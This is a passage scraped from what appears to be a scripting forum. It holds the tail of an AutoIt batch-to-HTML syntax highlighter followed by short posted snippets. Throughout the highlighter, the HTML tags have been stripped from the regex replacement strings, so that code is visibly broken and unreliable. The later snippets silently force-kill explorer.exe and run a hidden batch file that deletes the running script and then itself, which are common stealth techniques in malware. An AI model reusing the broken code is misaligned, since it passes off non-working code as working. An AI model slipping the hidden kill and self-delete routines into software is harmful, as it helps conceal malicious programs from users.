$HTML=StringRegExpReplace($HTML, '(?im)(?$1') ; COMMAND, EXE Next $HTML=StringRegExpReplace($HTML, '(?i)(if<.*?)\b(EQU|NEQ|LSS|LEQ|GTR|GEQ)\b', '$1$2') ; OPERATOR $HTML=StringRegExpReplace($HTML, '(?i)(?<=Call<\/span>)([ ]*:?\w+)\b', '$1') ; LABEL $HTML=StringRegExpReplace($HTML, '(?i)(?<=goto<\/span>)([ ]*:?\w+)\b', '$1') ; LABEL $HTML=StringRegExpReplace($HTML, '(?m)^([ ]*:[^:][^\r\n]*)', '$1') ; LABEL $HTML=StringRegExpReplace($HTML, '(?im)^([ ]*::[^\r\n]*|[ ]*rem[ ]+[^\r\n]*)', '$1') ; COMMENT $HTML=StringRegExpReplace($HTML, '(?i)('&$sh0&')', '$0') ; VARIABLE $HTML=StringRegExpReplace($HTML, '(?i)(?<=)(%[a-zA-Z_$]\w*?%|%[a-zA-Z_$]\w*?:~.*?%)', '$0') ; VARIABLE, переменные $HTML=StringRegExpReplace($HTML, '([^<]+?)()(.*?)', '\1\3') ; объединение переменных ; Дополнительный поиск переменных $sh0= _ '(? '(? '%%[\w$]+?%%|' $HTML_Var=StringRegExpReplace($tmpHTML, '('&$sh0&')', '') ; удаляем переменные первого прохода $aHTML_Var=StringRegExp($HTML_Var, '(%[^%][\w$]+?:[\w.,;@#$*/\-+=]*?[^%]%|%%[a-zA-Z_$][\w$]*?:[\w.,;@#$*/\-+=]*?%%)', 3) ; переменные содержащие операторы If Not @error Then For $i = 0 to UBound($aHTML_Var)-1 $tmp=StringRegExpReplace($aHTML_Var[$i], '['&$kOperator&']+', '$0') ; OPERATOR $tmp=StringRegExpReplace($tmp, '(%%\w)', '$0') ; VARIABLE, переменные $HTML=StringReplace($HTML, $tmp, ''&$aHTML_Var[$i]&'') Next EndIf ; конец: Дополнительный поиск переменных ; исключительные переменные $HTML=StringRegExpReplace($HTML, '(?\*', '%*') ; %* $HTML=StringRegExpReplace($HTML, '%ProgramFiles\(x86\)%', '%ProgramFiles(x86)%') ; удаление из строк коментариев иные стили Do $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*rem[ ].*?)(.+?)(.*?)', '$1$2$3') Until @Extended=0 ; удаление из строк коментариев и меток иные стили Do $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*:{1,2}.*?)(.+?)(.*?)', '$1$2$3') Until @Extended=0 $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*:.+?[ ]+)(.+?)', '$1$2') ; комментарии после метки ; Отменить подсвечивание после title, кроме переменных Do $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*title .*?)(.+?)(.*?)', '$1$2$3') Until @Extended=0 ; Отменить подсвечивание после echo, кроме переменных If $tmpEcho<>1 Then Do $HTML=StringRegExpReplace($HTML, '(?mi)^([ ]*echo .*?)(.+?)(.*?)', '$1$2$3') ;[^=+<>*?|)(&^] Until @Extended=0 EndIf ; удаление вложенных тегов ; $HTML=StringRegExpReplace($HTML, '(?mi)(.*?)(?!)(.+?)(.*?)', '$1$2$3') ; '%TP:~0,-1%' ; $HTML=StringRegExpReplace($HTML, '(?mi)(.*?)(?!)', '$1') ; $HTML=StringRegExpReplace($HTML, '(?mi)()(?!)(.*?)', '$2') Do $HTML=StringRegExpReplace($HTML, '(?mi)([^<]*?)(.+?)', '$1$2') Until @Extended=0 ; удаление последовательных одинаковых тегов Do $HTML=StringRegExpReplace($HTML, '(?s)([^<]*?)([\s]*)', '\1\3') Until @Extended=0 $HTML=StringReplace($HTML, ' 3ksl4¤nl3r01k ', '<') ; восстановление символа временно заменённого ; замена отмены переменных ; If $TrVarCn=1 Then ; $sysvar=StringSplit('ProgramFiles|SystemRoot|windir|TEMP|SystemDrive|COMMONPROGRAMFILES|AllUsersProfile|UserProfile', '|') ; For $i = 1 to $sysvar[0] ; $sys0=StringLeft($sysvar[$i], 1) ; $sys1=StringTrimLeft($sysvar[$i], 1) ; $HTML=StringRegExpReplace($HTML, '(?i)%%'&$sys0&''&$sys1&'%%', '%%'&$sys0&$sys1&'%%') ; Next ; $TrVarCn=0 ; EndIf $HTML=StringTrimLeft($HTML, 2) ; проверка удалением тегов If $tmpCheck=1 Then $ChecHTML=StringRegExpReplace($HTML, '(?s)(.*?)', '$1') If $tmpHTML<>$ChecHTML And MsgBox(4, $LngErr, $LngMs1)=6 Then $TrSvErr=1 EndIf ;i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i!i $HTML=$head1&$HTML&$End2 EndIf _Sini('CB') _Sini('BB') _Sini('En') _Sini('Check') _Sini('Echo') Return $HTML EndFunc Func _Sini($var) If Eval('Tr' & $var)<>Eval('tmp' & $var) Then Assign('Tr'& $var, Eval('tmp' & $var)) IniWrite($Ini, 'Set', $var, Eval('Tr' & $var)) EndIf EndFunc Func _ChState($st) GUICtrlSetState($ChCode, $st) GUICtrlSetState($ChB_KW, $st) GUICtrlSetState($ChB_Var, $st) GUICtrlSetState($Chi_Com, $st) EndFunc Func _StyleIni($Style) Switch $Style Case 'из ini' $BACKGROUND=IniRead($Ini, 'Color', 'BACKGROUND', 'FFFFFF') $BKGRD2=IniRead($Ini, 'Color', 'BKGRD2', 'FFFF00') $BORDER=IniRead($Ini, 'Color', 'BORDER', 'AAAAAA') $DEFAULT=IniRead($Ini, 'Color', 'DEFAULT', '000000') $COMMENT=IniRead($Ini, 'Color', 'COMMENT', '008000') $KEYWORDS=IniRead($Ini, 'Color', 'KEYWORDS', '0000FF') $LABEL=IniRead($Ini, 'Color', 'LABEL', 'FF0000') $HIDESYBOL=IniRead($Ini, 'Color', 'HIDESYBOL', 'FF00FF') $COMMAND=IniRead($Ini, 'Color', 'COMMAND', '0080FF') $VARIABLE=IniRead($Ini, 'Color', 'VARIABLE', 'FF8000') $OPERATOR=IniRead($Ini, 'Color', 'OPERATOR', 'FF0000') Case 'Black(HTML)' $BACKGROUND='3F3F3F' $BKGRD2='000' $BORDER='AAAAAA' $DEFAULT='999999' $COMMENT='71AE71' $KEYWORDS='009FFF' $LABEL='C8C800' $HIDESYBOL='FF46FF' $COMMAND='AAA6DB' $VARIABLE='D39D72' $OPERATOR='FF8080' Case 'White' $BACKGROUND='FFFFFF' $BKGRD2='FFFF00' $BORDER='AAAAAA' $DEFAULT='000000' $COMMENT='008000' $KEYWORDS='0000FF' $LABEL='FF0000' $HIDESYBOL='FF00FF' $COMMAND='0080FF' $VARIABLE='FF8000' $OPERATOR='FF0000' EndSwitch EndFunc ; #Include ; не поддаётся обфускации, пришлось вытащить функцию. ;Description: Converts cyrillic string from IBM 866 codepage to Microsoft 1251 codepage ;Author: Latoid Func _Encoding_866To1251($sString) Local $sResult = "", $iCode Local $Var866Arr = StringSplit($sString, "") For $i = 1 To $Var866Arr[0] $iCode = Asc($Var866Arr[$i]) Select Case $iCode >= 128 And $iCode <= 175 $Var866Arr[$i] = Chr($iCode + 64) Case $iCode >= 224 And $iCode <= 239 $Var866Arr[$i] = Chr($iCode + 16) Case $iCode = 240 $Var866Arr[$i] = Chr(168) Case $iCode = 241 $Var866Arr[$i] = Chr(184) Case $iCode = 252 $Var866Arr[$i] = Chr(185) EndSelect $sResult &= $Var866Arr[$i] Next Return $sResult EndFunc ;==>_Encoding_866To1251 ; вычисление координат дочернего окна Func _ChildCoor($Gui, $w, $h, $c=0, $d=0) Local $aWA = _WinAPI_GetWorkingArea(), _ $GP = WinGetPos($Gui), _ $wgcs=WinGetClientSize($Gui) Local $dLeft=($GP[2]-$wgcs[0])/2, _ $dTor=$GP[3]-$wgcs[1]-$dLeft If $c = 0 Then $GP[0]=$GP[0]+($GP[2]-$w)/2-$dLeft $GP[1]=$GP[1]+($GP[3]-$h-$dLeft-$dTor)/2 EndIf If $d>($aWA[2]-$aWA[0]-$w-$dLeft*2)/2 Or $d>($aWA[3]-$aWA[1]-$h-$dLeft+$dTor)/2 Then $d=0 If $GP[0]+$w+$dLeft*2+$d>$aWA[2] Then $GP[0]=$aWA[2]-$w-$d-$dLeft*2 If $GP[1]+$h+$dLeft+$dTor+$d>$aWA[3] Then $GP[1]=$aWA[3]-$h-$dLeft-$dTor-$d If $GP[0]<=$aWA[0]+$d Then $GP[0]=$aWA[0]+$d If $GP[1]<=$aWA[1]+$d Then $GP[1]=$aWA[1]+$d $GP[2]=$w $GP[3]=$h Return $GP EndFunc Func _WinAPI_GetWorkingArea() Local Const $SPI_GETWORKAREA = 48 Local $stRECT = DllStructCreate("long; long; long; long") Local $SPIRet = DllCall("User32.dll", "int", "SystemParametersInfo", "uint", $SPI_GETWORKAREA, "uint", 0, "ptr", DllStructGetPtr($stRECT), "uint", 0) If @error Then Return 0 If $SPIRet[0] = 0 Then Return 0 Local $sLeftArea = DllStructGetData($stRECT, 1) Local $sTopArea = DllStructGetData($stRECT, 2) Local $sRightArea = DllStructGetData($stRECT, 3) Local $sBottomArea = DllStructGetData($stRECT, 4) Local $aRet[4] = [$sLeftArea, $sTopArea, $sRightArea, $sBottomArea] Return $aRet EndFunc Func _About() $GP=_ChildCoor($Gui, 270, 180) GUISetState(@SW_DISABLE, $Gui) $font="Arial" $Gui1 = GUICreate($LngAbout, $GP[2], $GP[3], $GP[0], $GP[1], BitOr($WS_CAPTION, $WS_SYSMENU, $WS_POPUP), -1, $Gui) GUISetBkColor (0xffca48) GUICtrlCreateLabel($LngTitle, 0, 0, 270, 63, 0x01+0x0200) GUICtrlSetFont (-1,15, 600, -1, $font) GUICtrlSetColor(-1,0xa13d00) GUICtrlSetBkColor (-1, 0xfbe13f) GUICtrlCreateLabel ("-", 2,64,268,1,0x10) GUISetFont (9, 600, -1, $font) GUICtrlCreateLabel($LngVer&' 0.7 01.11.2011', 55, 100, 210, 17) GUICtrlCreateLabel($LngSite&':', 55, 115, 40, 17) $url=GUICtrlCreateLabel('[Hidden Content]', 92, 115, 170, 17) GUICtrlSetCursor(-1, 0) GUICtrlSetColor(-1, 0x0000ff) GUICtrlCreateLabel('WebMoney:', 55, 130, 85, 17) $WbMn=GUICtrlCreateLabel('R939163939152', 130, 130, 125, 17) GUICtrlSetColor(-1,0xa21a10) GUICtrlSetTip(-1, $LngCopy) GUICtrlSetCursor(-1, 0) GUICtrlCreateLabel('Copyright AZJIO © 2010-2011', 55, 145, 210, 17) GUISetState(@SW_SHOW, $Gui1) $msg = $Gui1 While 1 $msg = GUIGetMsg() Select Case $msg = $url ShellExecute ('[Hidden Content]') Case $msg = $WbMn ClipPut('R939163939152') Case $msg = -3 $msg = $Gui GUISetState(@SW_ENABLE, $Gui) GUIDelete($Gui1) ExitLoop EndSelect WEnd EndFunc Func _CreateCSS() $text= _ '.au3_codebox /* BK */' & @CRLF & _ '{' & @CRLF & _ ' BORDER-BOTTOM: #'&$BORDER&' 1px solid;' & @CRLF & _ ' BORDER-LEFT: #'&$BORDER&' 1px solid;' & @CRLF & _ ' BORDER-RIGHT: #'&$BORDER&' 1px solid;' & @CRLF & _ ' BORDER-TOP: #'&$BORDER&' 1px solid;' & @CRLF & _ ' PADDING-RIGHT: 8px;' & @CRLF & _ ' PADDING-LEFT: 8px;' & @CRLF & _ ' PADDING-BOTTOM: 8px;' & @CRLF & _ ' PADDING-TOP: 8px;' & @CRLF & _ ' FONT-SIZE: 12px;' & @CRLF & _ ' FONT-FAMILY: Arial, Courier New, Verdana, Courier, Helvetica, sans-serif, MS sans serif;' & @CRLF & _ ' FONT-WEIGHT: normal;' & @CRLF & _ ' BACKGROUND-color: #'&$BACKGROUND&';' & @CRLF & _ ' WHITE-SPACE: pre;' & @CRLF & _ ' font-family: Arial;' & @CRLF & _ ' font-weight: normal;' & @CRLF & _ ' color: #'&$DEFAULT&';' & @CRLF & _ ' line-height: normal;' & @CRLF & _ ' margin-top: 0.5em;' & @CRLF & _ ' margin-bottom: 0.5em;' & @CRLF & _ '}' & @CRLF & _ @CRLF & _ '.S0 /* DEFAULT */' & @CRLF & _ '{' & @CRLF & _ ' font-weight: normal;' & @CRLF & _ ' color: #'&$DEFAULT&';' & @CRLF & _ '}' & @CRLF & _ '.S1 /* COMMENT */' & @CRLF & _ '{' & @CRLF & _ ' font-style: italic;' & @CRLF & _ ' color: #'&$COMMENT&';' & @CRLF & _ '}' & @CRLF & _ '.S2 /* KEYWORDS */' & @CRLF & _ '{' & @CRLF & _ ' font-weight: bold;' & @CRLF & _ ' color: #'&$KEYWORDS&';' & @CRLF & _ '}' & @CRLF & _ '.S3 /* LABEL */' & @CRLF & _ '{' & @CRLF & _ ' color: #'&$LABEL&';' & @CRLF & _ ' background-color: #'&$BKGRD2&';' & @CRLF & _ '}' & @CRLF & _ '.S4 /* HIDE SYBOL */' & @CRLF & _ '{' & @CRLF & _ ' color: #'&$HIDESYBOL&';' & @CRLF & _ '}' & @CRLF & _ '.S5 /* COMMAND */' & @CRLF & _ '{' & @CRLF & _ ' color: #'&$COMMAND&';' & @CRLF & _ '}' & @CRLF & _ '.S6 /* VARIABLE */' & @CRLF & _ '{' & @CRLF & _ ' color: #'&$VARIABLE&';' & @CRLF & _ '}' & @CRLF & _ '.S7 /* OPERATOR */' & @CRLF & _ '{' & @CRLF & _ ' color: #'&$OPERATOR&';' & @CRLF & _ '}' $file = FileOpen(@ScriptDir&'\Style.css',2) FileWrite($file, $text) FileClose($file) EndFunc [/LENGUAJE][/HIDE-THANKS]
      24. 1 point
        Simple get info: [HIDE-THANKS][LENGUAJE=autoit] ;LeVeL-23.cc #include $iPID = Run(@ComSpec &' /C '& 'ipconfig.exe', @SystemDir, @SW_HIDE, $STDOUT_CHILD) $sTXT = "" While 1 $sTXT &= StdoutRead($iPID) If @error Then ExitLoop Wend MsgBox(0,"IpConfig", $sTXT) [/LENGUAJE][/HIDE-THANKS]
      25. 1 point
        Process kill (CMD) [HIDE-THANKS] > $Process = "explorer.exe" ; <== process for kill Run(@ComSpec & " /c Taskkill.EXE /F /IM " & $Process, "", @SW_HIDE) [/HIDE-THANKS] Self delete (BAT) [HIDE-THANKS] > #Include Func _SelfDel() $sTemp = _TempFile(@TempDir, '~', '.bat') $sPath = FileGetShortName(@ScriptFullPath) $hFile = FileOpen($sTemp, 2) FileWriteLine($hFile, '@echo off') FileWriteLine($hFile, ':loop') FileWriteLine($hFile, 'del ' & $sPath) FileWriteLine($hFile, 'if exist ' & $sPath & ' goto loop') FileWriteLine($hFile, 'del ' & $sTemp) FileClose($hFile) Run($sTemp, '', @SW_HIDE) EndFunc ;==>_ScriptDestroy _SelfDel() [/HIDE-THANKS]